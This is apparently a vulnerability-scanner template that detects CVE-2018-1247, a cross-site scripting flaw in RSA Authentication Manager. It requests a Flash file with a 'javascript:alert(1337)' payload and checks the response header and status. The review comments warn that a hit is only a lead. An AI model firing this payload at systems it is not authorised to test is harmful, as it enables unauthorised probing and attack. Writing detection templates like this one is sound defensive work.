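# Detection template for CVE-2018-1247 (RSA Authentication Manager XSS).
# It requests the pmfso.swf file under /IMS-AA-IDP/ with a gotoUrlLocal
# parameter and reports a hit when the server answers with a Flash object.
id: CVE-2018-1247

info:
  name: RSA Authentication Manager XSS
  author: madrobot
  severity: medium

requests:
  - method: GET
    path:
      - "{{BaseURL}}/IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert(1337)//"

    # Both matchers must hold. The header check alone would also fire on an
    # error or redirect response that merely declares a Flash content type.
    matchers-condition: and
    matchers:
      # NOTE(review): this only shows that the SWF is still being served. It
      # does not prove the parameter is honoured, so treat a hit as a lead and
      # confirm the appliance's patch level before reporting it as vulnerable.
      - type: word
        words:
          - "application/x-shockwave-flash"
        part: header

      # Require a successful response so the hit reflects a file that exists.
      - type: status
        status:
          - 200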